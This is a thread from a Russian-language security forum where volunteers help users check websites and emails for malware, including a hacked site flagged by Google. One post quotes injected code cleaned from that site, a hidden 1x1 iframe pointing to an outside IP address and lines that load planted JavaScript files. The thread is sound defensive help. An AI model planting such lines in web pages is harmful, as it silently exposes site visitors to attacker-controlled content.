1. Администрация SafeZone приветствует вас на нашем форуме!
    Если вы больше не желаете видеть рекламу при просмотре тем и сообщений - то достаточно просто зарегистрироваться. Для зарегистрированных пользователей реклама не отображается.
    Если у вас возникли проблемы с регистрацией на форуме - то вы можете сообщить об этом с помощью этой формы без авторизации,администрация форума обязательно отреагирует на вашу проблему.
    Скрыть объявление

Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте в этой теме

Тема в разделе "Сетевая безопасность для начинающих", создана пользователем akok, 19 янв 2009.

Статус темы:
Закрыта.
  1. akok
    Онлайн

    akok Команда форума Администратор

    Сообщения:
    13.086
    Симпатии:
    14.377
    Баллы:
    2.193
    Нашим ресурсом оказываются услуги по проверке интернет ресурсов на наличие вредоносного кода.

    Прошу учесть, что помощь оказывается добровольцами и поэтому не требуйте немедленной помощи. Вам обязательно окажут помощь.

    Если вы хотите проверить сайт на вирусы, то выполните простые правила оформления запроса:
    1. Администрация имеет право отказать в проверке, в случае, если проверяемый ресурс нарушает законодательство или правила данного ресурса (варез, хакерская тематика, материалы порнографического характера).
    2. Никогда не публикуйте активных ссылок. (заменяйте http на хттп, например http://safezone.cc - нужно писать как хттп://safezone.cc)
    3. Не прикрепляйте файлы, которые предлагают вам скачать подозреваемые сайты. (Просто укажите имя файла, который пытается загрузится).
    4. Если Вы подозреваете, что после посещения подозрительного сайта Ваш компьютер подвергся заражению, то лучше выполнить правила оформления запроса.

    *Мы не можем гарантировать 100% результат анализа. Слишком много факторов которых невозможно учесть.
     
    5 пользователям это понравилось.
  2. regist
    Оффлайн

    regist гоняюсь за туманом Ассоциация VN/VIP VIP Разработчик

    Сообщения:
    11.771
    Симпатии:
    5.446
    Баллы:
    848
    у меня нет фейсбука и никогда не было :p, но иногда приходят сообщения от него. Уже точно не помню, но кажется, что кто-то там меня хочет в друзья добавить :rolleyes:
     
  3. shestale
    Оффлайн

    shestale Ассоциация VN/VIP Преподаватель

    Сообщения:
    8.761
    Симпатии:
    4.765
    Баллы:
    593
    Dragokas, есть один детект у Norman на Redirector.KV, больше пока ни чего сказать не могу, так как сегодня у меня с интернетом проблемы...на страничке есть ссылки на .js, скачай и посмотри, ты же в них разбираешься ;)
     
  4. orderman
    Оффлайн

    orderman Активный пользователь

    Сообщения:
    1.164
    Симпатии:
    1.397
    Баллы:
    433
    regist, если не ошибаюсь, то на фейсбуке есть возможность пригласить друзей используя адресную книгу почтового ящика. Так что если у кого-то из друзей есть ваш адрес, то от него и письмо;)
     
    machito нравится это.
  5. akok
    Онлайн

    akok Команда форума Администратор

    Сообщения:
    13.086
    Симпатии:
    14.377
    Баллы:
    2.193
    Тут может быть все, от банального фишинга, до "упаривания" зловреда.
     
  6. Phoenix
    Оффлайн

    Phoenix Активный пользователь

    Сообщения:
    2.015
    Симпатии:
    1.988
    Баллы:
    283
    Dragokas,конечный сайт - hттp://postila.ru/ ,ваша ссылка это реферал (имхо но твёрдое :)) то есть, если товары купят (или что там) по этой ссылке, то хозяину реферала бонус.
    Кстати, вы уже видели новый сервис http://vms.drweb.com/online/ (только не смейтесь, проверьте ссылку, сервис классный ;))
    перенаправляет на
    hттp://postila.ru/user/lp/m/хххххххххххххххххххххххххххх/h/b69741837863417d3dffdg61e97f7?email=2c930afa59bdgdg9db2c441cac4516ed5

    (hттp://my.mail.ru/mail/хххххххххххххх - существует)
    Я подставил мёртвый адрес и редиректнулся.
     
    Последнее редактирование модератором: 3 ноя 2013
    machito и Dragokas нравится это.
  7. regist
    Оффлайн

    regist гоняюсь за туманом Ассоциация VN/VIP VIP Разработчик

    Сообщения:
    11.771
    Симпатии:
    5.446
    Баллы:
    848
    Phoenix, читаем шапку темы и не всталяем на форуме активные потенциально вредоносные ссылки!

    UPD
    . ссылки выше подправил убрав личную информацию.
     
    Последнее редактирование: 3 ноя 2013
    Phoenix нравится это.
  8. Dragokas
    Оффлайн

    Dragokas Very kind Developer Команда форума Супер-Модератор Разработчик Клуб переводчиков

    Сообщения:
    4.946
    Симпатии:
    4.823
    Баллы:
    338
    Phoenix, просьба также предварительно согласовывать выкладывание в открытый доступ дешифрованных персональных данных.
    Спасибо.
     
    Phoenix нравится это.
  9. SNS-amigo
    Оффлайн

    SNS-amigo SNS System Watch Freelance reporter

    Сообщения:
    5.219
    Симпатии:
    8.911
    Баллы:
    643
    Это немного не так. Там есть предлагаемая возможность пригласить друзей и абонентов, используя ваш адрес email, который был введен при регистрации на FB. С точки зрения тех.администрации это простой процесс создать аудиторию для себя лично и для созданных вами групп.
    Действует этот так. Предложение "Пригласите друзей, используя email" вылезает очень часто, кто-то по незнанию или по осознанному желанию ответил на это предложение и ввел пароль от своей почты в предлагаемое поле. После этого FB автоматом авторизуется в его почте, считывает там адресную книгу — контакты адресатов и абонентов, которые вам присылали почту и получали её от вас.

    [​IMG] [​IMG] [​IMG]

    Не скажу, что FB самая защищенная сеть, но конфиденциальности там уделяется немало времени. Именно из-за этого FB довольно "туг на ухо". Но имеется возможность защищить свою учетную запись специальными решениями разработчиков средств безопасности. Это можно, например, сделать из программ Norton, или подключить специальное приложение Norton Safe Web, чтобы выполнялся Norton Auto-Scan.

    [​IMG] [​IMG]
     
    machito, Phoenix и Dragokas нравится это.
  10. SNS-amigo
    Оффлайн

    SNS-amigo SNS System Watch Freelance reporter

    Сообщения:
    5.219
    Симпатии:
    8.911
    Баллы:
    643
    Забыл сказать, что для того, чтобы подключить специальное приложение Norton Safe Web, не обязательно быть пользователем программ Нортон. Но именно это приложение действует наиболее эффективно в плане защиты и фильтрации спама. Потому у тебя нет ни спама, не левых поползновений и никто не жалуется на твою учетку, действующую самовольно.
    Вот страница самого приложения NSW в FB: https://apps.facebook.com/nortonsafeweb/
    А вот другие приложения (игры, календарь и пр. пр.) после подключения к вам получают монопольный доступ к вашему аккаунту и от вашего имени могут рассылать приглашения. Впрочем, так не только в FB, но только FB честно предупреждает об этом при добавлении приложения. В других соц.сетях этого предупреждения может и не быть, а суть та же, приложение будет надоедать и спамить за вас.
     
    Последнее редактирование: 4 ноя 2013
    Phoenix и machito нравится это.
  11. Ekliptika
    Оффлайн

    Ekliptika Пользователь

    Сообщения:
    2
    Симпатии:
    0
    Баллы:
    41
    Добрый день!

    Сегодня пришло на почту следующее письмо:
    Отправитель: "Voicemail" <admin@ledgo.ru>
    Тема: [VIRUS] Voicemail Message
    Дата: 18 ноября 2013 г., 13:04:11 GMT+4
    Получатель: maslov@ledgo.ru

    The attached message from Voicemail <admin@ledgo.ru>
    was found to contain the virus "Sanesecurity.Malware.22801.ZipHeur.UNOFFICIAL(7cc92d5b83b12 b9ddb82abd377e9f992:7106)".
    The infected portion of the message was removed by Virus Blocker.
    Значит ли это, что на сайте появился новый вирус?

    Сайт ledgo.ru.

    А еще постоянно (с интервалом 15 минут) приходят на почту письма такого содержания:
    Отправитель: root@bitrix118.timeweb.ru (Cron Daemon)
    Тема: Cron <talipov@bitrix118> /usr/local/bin/php /home/t/talipov/mega-shara/public_html/autobacup.php
    Дата: 15 ноября 2013 г., 13:15:01 GMT+4
    Получатель: ilgam@ledgo.ru

    Could not open input file: /home/t/talipov/mega-shara/public_html/autobacup.php
    Что это и как с этим бороться?
     
    Последнее редактирование: 18 ноя 2013
  12. akok
    Онлайн

    akok Команда форума Администратор

    Сообщения:
    13.086
    Симпатии:
    14.377
    Баллы:
    2.193
    Проверьте наличие файла, cron не может его найти и шлет ошибки.


    Не факт, проверьте, что рассылает форум. Срабатывание идет именно на почтовые сообщения.
     
    machito нравится это.
  13. S10
    Оффлайн

    S10 Активный пользователь

    Сообщения:
    23
    Симпатии:
    3
    Баллы:
    173
    Привет, друзья. Вновь обращаюсь к вам за подсказкой в поиске вредоносного кода...
    Гугл считает сайт зараженным. Помогите, плиз, отыскать заразу.
    Причём непонятно как вредоносный код мог попасть на сайт, если к сайту блокирован доступ по ФТП...

    Сайт хттп://rhl-mod.ru
     
  14. regist
    Оффлайн

    regist гоняюсь за туманом Ассоциация VN/VIP VIP Разработчик

    Сообщения:
    11.771
    Симпатии:
    5.446
    Баллы:
    848
    и считает, что вы распрастаряли зловредов, подробней тут.
     
  15. akok
    Онлайн

    akok Команда форума Администратор

    Сообщения:
    13.086
    Симпатии:
    14.377
    Баллы:
    2.193
    shell отлично справляется
     
  16. S10
    Оффлайн

    S10 Активный пользователь

    Сообщения:
    23
    Симпатии:
    3
    Баллы:
    173
    regist, я всю эту информацию от гугла изучил и мне понятно, что сайт взломали с целью распространения чего-то вредоносного. Но вот на какие кокретно строки в коде идёт реакция от гугла? Надеюсь, что мне профи подскажут...
     
  17. regist
    Оффлайн

    regist гоняюсь за туманом Ассоциация VN/VIP VIP Разработчик

    Сообщения:
    11.771
    Симпатии:
    5.446
    Баллы:
    848
    S10 и shestale нравится это.
  18. S10
    Оффлайн

    S10 Активный пользователь

    Сообщения:
    23
    Симпатии:
    3
    Баллы:
    173
    Спасибо!
    Опять счётчик) Помню однажды этот счётчик меня уже подводил, но не думаю что только в счётчике дело, т.к Akok правильно предположил что на сайте может быть шелл.

    Сам я не бездействую ни в коем случае, у меня вот такая информация:
    В некоторые страницы и скрипты сайта в конец дописывали такую строку:
    document.write('<iframe src="хттп://5.63.152.144/?id=1" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>');

    Также вызывались ещё подсаженные js
    ;document.write("<scr"+"ipt src='/images/regimage/backgrounds/dbzgt.js'><"+"/script>");
    ;document.write("<scr"+"ipt src='/images/pagination/alley.js'><"+"/script>");
    Если надо - могу содержание этих js выложить, там много кода

    Сейчас я это вычистил, левые js удалил. Но я уверен что это всё появится снова. Найти шелл пока не получается, т.к ищу вручную, а файлов довольно много. Вирус судя по всему какой-то злостный, а я далеко не матёрый борец с вирусами)
     
    Последнее редактирование: 15 дек 2013
  19. shestale
    Оффлайн

    shestale Ассоциация VN/VIP Преподаватель

    Сообщения:
    8.761
    Симпатии:
    4.765
    Баллы:
    593
    S10, regist прав:
     
    Последнее редактирование: 15 дек 2013
    S10 нравится это.
  20. regist
    Оффлайн

    regist гоняюсь за туманом Ассоциация VN/VIP VIP Разработчик

    Сообщения:
    11.771
    Симпатии:
    5.446
    Баллы:
    848
    S10, ещё подозрительно что при попытке зайти на ваш сайт (хттп://rhl-mod.ru) подряд происходит два редиректа (сначала на rhl-mod.ru/content.php?s=f9cb94c2f7b20cb8d469af93737a3a95 потом на rhl-mod.ru/content) - .htaccess рекомендую проверить, а так никакого shell-a не заметил там.
     
    Последнее редактирование: 15 дек 2013
    shestale нравится это.
  21. S10
    Оффлайн

    S10 Активный пользователь

    Сообщения:
    23
    Симпатии:
    3
    Баллы:
    173
    Да, парни, счётчики я убрал пока что. Но это тоже тема для разговора почему собсно коды счётчиков заражаются... Это же лайвинтернет - безобидный сервис по идее... Второй раз такое со счётчиками. Причём в первом случае ругался только яндекс, теперь только гугл)
    ---------------
    regist, может содержимое хтакцесс прислать? Но в таком виде там такие редиректы не прописаны. Это обилие букв после content.php - это может быть какая-нибудь вирусоопасная зашифровка?
     
Статус темы:
Закрыта.

Поделиться этой страницей